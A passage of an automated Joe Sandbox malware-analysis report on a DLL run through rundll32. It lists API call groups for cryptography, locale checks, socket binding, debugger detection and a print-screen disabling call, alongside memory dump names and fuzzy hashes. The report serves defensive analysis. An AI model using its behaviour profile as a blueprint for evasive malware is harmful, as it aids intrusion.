                    • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,?,?,?,?,6D02B622,?,?), ref: 6D045E74
                    • CryptDestroyKey.ADVAPI32(?,?,6D02B622,?,?), ref: 6D045E7E
                    • CryptReleaseContext.ADVAPI32(?,00000000,?,6D02B622,?,?), ref: 6D045E8A
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$Context$Release$AcquireDestroyEncryptImport
                    • String ID:
                    • API String ID: 3016261861-0
                    • Opcode ID: 35bf2a8f0a1af36072bb716302f0ae6ef26cdfbd75791ce0ede45b1cb5629d63
                    • Instruction ID: 966a756477ccb92cdad4dfa397f15af3ff961bf8cc71bd26963a5a910d7dd1c7
                    • Opcode Fuzzy Hash: 35bf2a8f0a1af36072bb716302f0ae6ef26cdfbd75791ce0ede45b1cb5629d63
                    • Instruction Fuzzy Hash: 76419F741083809FE7018B65C845B9BBFE4EF8A704F004958F5D8A7292C365E50ADB96
                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,2000000B,6D06BC3B,00000002,00000000,?,?,?,6D06BC3B,?,00000000), ref: 6D06B9C2
                    • GetLocaleInfoW.KERNEL32(00000000,20001004,6D06BC3B,00000002,00000000,?,?,?,6D06BC3B,?,00000000), ref: 6D06B9EB
                    • GetACP.KERNEL32(?,?,6D06BC3B,?,00000000), ref: 6D06BA00
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP
                    • API String ID: 2299586839-711371036
                    • Opcode ID: f372001d4a00e800baa9c49ace323828e2c11f618e2fc1b568ca167f99426ebf
                    • Instruction ID: 93a088ec4c9e8fedda46585b818558bde270e7fa8dcd7420d21831714db26814
                    • Opcode Fuzzy Hash: f372001d4a00e800baa9c49ace323828e2c11f618e2fc1b568ca167f99426ebf
                    • Instruction Fuzzy Hash: C721C8B2654182A6F7258F29C900BAB73F6FF46B64B428524F915DB209E772DD40C370
                    APIs
                    • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 6D04714C
                    • CryptGetHashParam.ADVAPI32(00000020,00000002,?,?,00000000), ref: 6D047169
                    • CryptDestroyHash.ADVAPI32(00000020), ref: 6D047177
                    • CryptReleaseContext.ADVAPI32(00000020,00000000), ref: 6D047187
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$Hash$Param$ContextDestroyRelease
                    • String ID:
                    • API String ID: 2110207923-3916222277
                    • Opcode ID: 64c8c07c2c8fb934fc15918475c17f7338d63e86438f59d8475ebf0017156a24
                    • Instruction ID: feb3e536e05071ef605541f9eeb558c43168e2a9b805c5181dde37c0f1f9b7b7
                    • Opcode Fuzzy Hash: 64c8c07c2c8fb934fc15918475c17f7338d63e86438f59d8475ebf0017156a24
                    • Instruction Fuzzy Hash: 1DF06770208312EBEB208F10CD09F5A7BF8EB49B10F008818F689E7190C7B0E804CBA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: %.*s%%25%s]$%25$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$file$file://%s%s%s$https
                    • API String ID: 0-4261736843
                    • Opcode ID: 6cf2b8200566ac057b63cfc185c422da2bc13b2007d06a8509b51c0de7b4dd44
                    • Instruction ID: 5cdd01db4b8aa1775015dc42cd5b9c418dce3f00c25b972218ed69ef2fe1269d
                    • Opcode Fuzzy Hash: 6cf2b8200566ac057b63cfc185c422da2bc13b2007d06a8509b51c0de7b4dd44
                    • Instruction Fuzzy Hash: 9212E0B5A08353AFFB10CF24C840B6AB7E4BF89354F450929E9558B391D732E914CBD2
                    APIs
                    • __invoke_watson.LIBCMT ref: 04EE035E
                      • Part of subcall function 04ED4EC7: __call_reportfault.LIBCMT ref: 04ED4ED4
                    • _strcpy_s.LIBCMT ref: 04EE0393
                    • _strcpy_s.LIBCMT ref: 04EE03B0
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _strcpy_s$__call_reportfault__invoke_watson
                    • String ID: T
                    • API String ID: 2863396484-3187964512
                    • Opcode ID: ff093b41e1ce13d86105b4c2306c29e94f89965ce5a4dbc28058ac2a49ec967a
                    • Instruction ID: 6a4f78f07b5c03dc51841ea23f4cdc085848fc19d15194ecc7e38e7135d61e7e
                    • Opcode Fuzzy Hash: ff093b41e1ce13d86105b4c2306c29e94f89965ce5a4dbc28058ac2a49ec967a
                    • Instruction Fuzzy Hash: A4528F71E0066ACFDF24CFA9C4402FEB7B1FF44318F54916AD846AB241E7B4AA45CB94
                    APIs
                      • Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
                      • Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7
                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6D06BC0D
                    • IsValidCodePage.KERNEL32(00000000), ref: 6D06BC4B
                    • IsValidLocale.KERNEL32(?,00000001), ref: 6D06BC5E
                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6D06BCA6
                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6D06BCC1
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                    • String ID:
                    • API String ID: 415426439-0
                    • Opcode ID: 4ff876cf6053c9585de6a888c544edba314253258c02ff786402cbb04a7d8710
                    • Instruction ID: 9a55b447c23371d65229fb49dc1b9955b5fe268f2946c6bf8c8a8554850b2460
                    • Opcode Fuzzy Hash: 4ff876cf6053c9585de6a888c544edba314253258c02ff786402cbb04a7d8710
                    • Instruction Fuzzy Hash: 88513DB1904256AAFF00DFA5CC40BBE77B8BF49714F454469B910EB190EBB1DA41CB71
                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 04EB4070
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04EB4085
                    • UnhandledExceptionFilter.KERNEL32(04EC9380), ref: 04EB4090
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 04EB40AC
                    • TerminateProcess.KERNEL32(00000000), ref: 04EB40B3
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID:
                    • API String ID: 2579439406-0
                    • Opcode ID: 72fd526bdf0cb3c673509240a24e63f2b999b3e2d9e90a431b9637c95fd5fac0
                    • Instruction ID: fc3e81706ef3ce1c56a2ab8c3bfa823cf67ca8839669be70bf2d9f6e8b9eff7a
                    • Opcode Fuzzy Hash: 72fd526bdf0cb3c673509240a24e63f2b999b3e2d9e90a431b9637c95fd5fac0
                    • Instruction Fuzzy Hash: 5C21B0B6910304DFD710DF7AE1496883BB0FB88306F50516AE5488B389E7BA5E83CF85
                    APIs
                      • Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
                      • Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7
                    • GetACP.KERNEL32(?,?,?,?,?,?,6D061671,?,?,?,00000055,?,-00000050,?,?,00000002), ref: 6D06B24F
                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D061671,?,?,?,00000055,?,-00000050,?,?), ref: 6D06B286
                      • Part of subcall function 6D0633BD: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,?,-00000050,?,?,?,6D0621E7,?,20001004,00000000,00000002,?,?,6D0617D9,?,?), ref: 6D0633DC
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6D06B3E9
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$CodeDisableInfoLocalePagePrintScreen@@Valid
                    • String ID: utf8
                    • API String ID: 1994587716-905460609
                    • Opcode ID: c9323aea24a9b9b1e7112ee61bee199bf48e23837bbe3eed7469c47f27091560
                    • Instruction ID: ff76b471e7b93c89a24fbc827338eb1f687f14ee0e88b3cabaa47d394116025d
                    • Opcode Fuzzy Hash: c9323aea24a9b9b1e7112ee61bee199bf48e23837bbe3eed7469c47f27091560
                    • Instruction Fuzzy Hash: 017106B16086A3AAFB15EF75CC41BBA73E8EF45704F11442AFA25DB180EB74E5408771
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f60daeb8ecbfcdb1d20b3ad555608b560b613ff68668e2d3fa8b828c549c6f2d
                    • Instruction ID: 5fd27eca7eaab769019696f22ee764be3aefdd60a0c4be126a6e4bab36dc800a
                    • Opcode Fuzzy Hash: f60daeb8ecbfcdb1d20b3ad555608b560b613ff68668e2d3fa8b828c549c6f2d
                    • Instruction Fuzzy Hash: 1B025F71E00219ABEB14CFA9D9907EEBBF5FF88314F258269D915A7340D731A911CB90
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6D049B96
                    • IsDebuggerPresent.KERNEL32 ref: 6D049C62
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D049C7B
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 6D049C85
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                    • String ID:
                    • API String ID: 254469556-0
                    • Opcode ID: 1630eae5fe3a0533d9250b9073e5501a23267489ea9550d2c9c95cab525492c0
                    • Instruction ID: 11213f81092ebecd2bc4505c88364f63c6aa7d93e475a629af27d1e33f162450
                    • Opcode Fuzzy Hash: 1630eae5fe3a0533d9250b9073e5501a23267489ea9550d2c9c95cab525492c0
                    • Instruction Fuzzy Hash: CC31FBB5D05229DBEF10DFA5D949BCDBBF4BF08304F1081AAE50DAB240EB719A858F45
                    APIs
                    • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 6D0449FC
                    • CryptGetHashParam.ADVAPI32(00000010,00000002,?,?,00000000), ref: 6D044A19
                    • CryptDestroyHash.ADVAPI32(00000010), ref: 6D044A27
                    • CryptReleaseContext.ADVAPI32(00000010,00000000), ref: 6D044A37
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$Hash$Param$ContextDestroyRelease
                    • String ID:
                    • API String ID: 2110207923-0
                    • Opcode ID: c0a8cf70fe8c7e685cff79b3c185aaa0fbbbfd4458071659ab7b9d7cfc9ae14b
                    • Instruction ID: 0e1baaf00ba15e523428729945c0ec367c91eaa408b356ca0951417d54951e82
                    • Opcode Fuzzy Hash: c0a8cf70fe8c7e685cff79b3c185aaa0fbbbfd4458071659ab7b9d7cfc9ae14b
                    • Instruction Fuzzy Hash: 27F01770209312FBFB208F10CD09F9A7BF8EB49B11F108818F685E6190D7B1E8149BA5
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$GMT
                    • API String ID: 0-988243589
                    • Opcode ID: 03392f8f2e9cde61c7094af7b32d705c5d2b345fc9206884fa078ef871cc8c66
                    • Instruction ID: 8eb94db047df7a900f7a63586b2a535b1953894f22f12bb836d94342751ca2ac
                    • Opcode Fuzzy Hash: 03392f8f2e9cde61c7094af7b32d705c5d2b345fc9206884fa078ef871cc8c66
                    • Instruction Fuzzy Hash: 7D02B17190C3068FE714DEA8DC8076AB7E5AB86324F544B2EF5A8C73D0E770D9458B92
                    APIs
                    • bind.WS2_32(?,00000030,?), ref: 6D02F0BB
                    • WSAGetLastError.WS2_32(?,00000100), ref: 6D02F0CF
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastbind
                    • String ID: bind() failed; %s
                    • API String ID: 2328862993-1141498939
                    • Opcode ID: 8f440b23df1debec614e0701c700681ba56f65faedc1aa5e3e1d3f2db0104149
                    • Instruction ID: d2a073a484dbd37ed1ad73aa2996977d2cb3cd88b226ac357883947ba09addf2
                    • Opcode Fuzzy Hash: 8f440b23df1debec614e0701c700681ba56f65faedc1aa5e3e1d3f2db0104149
                    • Instruction Fuzzy Hash: 0551D1316083868BFB219F35CC95BDFBFF8AF46340F840429E989DB282D77694448B52
                    APIs
                    • bind.WS2_32(?,00000030,?), ref: 6D02F2CF
                    • WSAGetLastError.WS2_32(?,00000100), ref: 6D02F2E3
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastbind
                    • String ID: bind() failed; %s
                    • API String ID: 2328862993-1141498939
                    • Opcode ID: 4eba7cd91ceb6437b7b0dc6b2c8715cb31253e7cc06d8cc441f70242318f128e
                    • Instruction ID: 46d2cbc49eed93e03226d79c74f54b13a9fa32622752eaee0a700eaf21d30161
                    • Opcode Fuzzy Hash: 4eba7cd91ceb6437b7b0dc6b2c8715cb31253e7cc06d8cc441f70242318f128e
                    • Instruction Fuzzy Hash: 9251B1705083029FFB21CF25C884BAABBF8FF46349F044469E9498B281D775E544CBA2
                    APIs
                      • Part of subcall function 6D060C41: GetLastError.KERNEL32(00000000,?,6D06497A), ref: 6D060C45
                      • Part of subcall function 6D060C41: SetLastError.KERNEL32(00000000,?,?,00000028,6D054D66), ref: 6D060CE7
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D06B601
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D06B64B
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D06B711
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: InfoLocale$ErrorLast
                    • String ID:
                    • API String ID: 661929714-0
                    • Opcode ID: 8503efd650a7464e0bfdac62c7f8fffcbb926dad0f1a9b97cbe76ce9ac6e0ac6
                    • Instruction ID: a08c2e5ade2f992f4f29e51dd99637e416a7c7d73c6fb0c8bf062240d472d02a
                    • Opcode Fuzzy Hash: 8503efd650a7464e0bfdac62c7f8fffcbb926dad0f1a9b97cbe76ce9ac6e0ac6
                    • Instruction Fuzzy Hash: 4061AEB15582579BFB198F28C892BBAB3F8FF05354F00406AFA19C6584EB74D941CB60
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6D04FBD4
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6D04FBDE
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6D04FBEB
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 355fe7811920caa0ef4919b51921aef3cc8fd00094e75d91e73977db936fd775
                    • Instruction ID: f3516ac0939661263f4c6e9ad82ffc6d8c5e10105b01b92a4a198e0a1ab51d5f
                    • Opcode Fuzzy Hash: 355fe7811920caa0ef4919b51921aef3cc8fd00094e75d91e73977db936fd775
                    • Instruction Fuzzy Hash: 8A31C874901229DBDB21DF64D988B8DBBF8BF08314F5081EAE51CA7290EB709F858F54
                    APIs
                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 6D044981
                    • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 6D04499A
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6D0449A7
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$Context$AcquireCreateHashRelease
                    • String ID:
                    • API String ID: 4045725610-0
                    • Opcode ID: 9a52e9fcf8d4a8aac55e9bb0680f4552279b78c8bbe3b51bf6bb36771b7b6cc4
                    • Instruction ID: 06b51b2f638f14a64f263fac7d7ec52accaeecbcd07b8b35adba9a08343e6194
                    • Opcode Fuzzy Hash: 9a52e9fcf8d4a8aac55e9bb0680f4552279b78c8bbe3b51bf6bb36771b7b6cc4
                    • Instruction Fuzzy Hash: 39E01A35248221BAFB205F25EC05FAA37F8AB06B50F104425B740FA1D4D7E2EC419A98
                    APIs
                    • htons.WS2_32(6D02C36A), ref: 6D02C14D
                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D02C185
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CurrentProcesshtons
                    • String ID:
                    • API String ID: 2530476045-0
                    • Opcode ID: 2d69479197c51e631a99975ec2200ef8baf15afb12a0f1b4b559da7c3f623325
                    • Instruction ID: 30ee2e041e7c234e2c983a46c8d0fad86922c1ef897a403c072886eafa5512cf
                    • Opcode Fuzzy Hash: 2d69479197c51e631a99975ec2200ef8baf15afb12a0f1b4b559da7c3f623325
                    • Instruction Fuzzy Hash: 03015A795183908BCB408F69C080796B7F4FF5A310F09D68AEC889F356D370D590C766
                    APIs
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,?,-00000050,?,?,?,6D0621E7,?,20001004,00000000,00000002,?,?,6D0617D9,?,?), ref: 6D0633DC
                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6D0621E7,?,20001004,00000000,00000002,?,?,6D0617D9), ref: 6D0633F1
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: DisableInfoLocalePrintScreen@@
                    • String ID:
                    • API String ID: 3878740904-0
